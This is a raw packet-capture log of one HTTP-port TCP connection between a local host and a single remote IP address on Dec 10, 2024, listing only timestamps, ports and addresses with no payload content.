Dec 10, 2024 00:42:24.193320036 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.193360090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.194084883 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.194124937 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.194184065 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.194226980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.194926023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.194972038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.195053101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.195741892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.195786953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.195789099 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.195827007 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.196573973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.196618080 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.196733952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.196775913 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.197380066 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.197418928 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.197560072 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.197602987 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.198210955 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.198255062 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.198283911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.198321104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.199053049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.199120045 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.199194908 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.199881077 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.199935913 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.200017929 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.200064898 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.200690985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.200740099 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.200802088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.200840950 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.201524019 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.201565027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.201626062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.201670885 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.202339888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.202382088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.202454090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.202495098 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.203231096 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.203385115 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.203427076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.204021931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.204065084 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.204150915 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.204190969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.204837084 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.204878092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.204946995 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.204991102 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.205653906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.205708027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.205770969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.205815077 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.206482887 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.206526995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.206682920 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.206727028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.207330942 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.207442045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.207489014 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.208162069 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.208199024 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.208268881 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.208314896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.208976984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.209017038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.209070921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.209136009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.209794044 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.209840059 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.209918976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.209961891 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.210640907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.210686922 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.210694075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.210736036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.256241083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.256253004 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.256344080 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.256515980 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.256563902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.256584883 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.256628990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.257214069 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.257261038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.257327080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.257374048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.258012056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.258058071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.258091927 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.258132935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.258846045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.258893013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.258919001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.258960009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.259670973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.259819984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.259866953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.260478020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.260524988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.260591030 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.260638952 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.261337042 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.261384964 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.261471987 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.261514902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.262154102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.262203932 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.262237072 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.262284040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.262980938 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.263041019 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.263099909 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.263820887 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.263868093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.263925076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.263964891 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.264635086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.264683008 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.264739037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.264785051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.265460968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.265511990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.265568018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.265614033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.266355991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.266401052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.266402960 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.266437054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.267153978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.267247915 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.267283916 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.267309904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.268018961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.268075943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.268105984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.268147945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.268783092 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.268831015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.268857956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.268903971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.269610882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.269654989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.269916058 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.269980907 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.270452023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.270499945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.270544052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.270589113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.271269083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.271374941 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.271424055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.272109032 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.272155046 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.272216082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.272262096 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.272902966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.272963047 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.272999048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.273063898 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.273785114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.273829937 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.273860931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.273900986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.274565935 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.274610043 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.274683952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.274730921 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.275407076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.275501966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.275548935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.276237965 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.276284933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.276335001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.276381969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.277045965 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.277095079 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.277157068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.277204990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.381496906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.381551981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.381608009 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.381654024 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.381962061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.382009029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.382085085 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.382129908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.382550001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.382596016 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.382613897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.382654905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.383460045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.383510113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.383543015 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.383582115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.384289980 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.384336948 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.384422064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.384466887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.385025978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.385073900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.385137081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.385180950 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.385840893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.385889053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.385950089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.385994911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.386667967 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.386739969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.386751890 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.386795998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.387507915 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.387557983 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.387640953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.387684107 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.388351917 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.388392925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.388478994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.388524055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.389158964 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.389204025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.389216900 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.389257908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.389990091 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.390034914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.390064001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.390105009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.390841007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.390887022 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.390919924 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.390961885 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.391658068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.391705990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.391769886 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.391815901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.392473936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.392519951 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.392580032 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.392625093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.393311977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.393357038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.393438101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.393482924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.394124031 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.394171000 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.394315958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.394361019 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.395036936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.395107031 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.395178080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.395226002 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.395796061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.395844936 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.395870924 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.395915985 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.396616936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.396663904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.396763086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.396809101 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.397459984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.397506952 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.397610903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.397655964 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.398305893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.398353100 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.398586035 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.398629904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.399139881 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.399188995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.399195910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.399240971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.399960041 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.400007963 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.400070906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.400118113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.400779009 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.400825977 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.400877953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.400924921 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.401580095 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.401623011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.401683092 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.401729107 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.402412891 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.402461052 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.402489901 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.402533054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.449172020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.449251890 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.449455023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.449527979 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.449558973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.449624062 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.449651957 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.449712038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.450376034 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.450423002 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.450453997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.450498104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.451222897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.451266050 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.451325893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.451369047 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.452034950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.452083111 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.452112913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.452156067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.452863932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.452909946 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.452966928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.453012943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.453701973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.453767061 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.453793049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.453830004 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.454518080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.454583883 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.454591036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.454627991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.490875006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.610178947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.936892986 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.936953068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.937019110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.937061071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.937251091 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.937292099 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.937323093 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.937361956 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.938081026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.938126087 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.938199043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:24.938236952 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:24.938908100 CET	80	49749	185.215.113.206	192.168.2.4
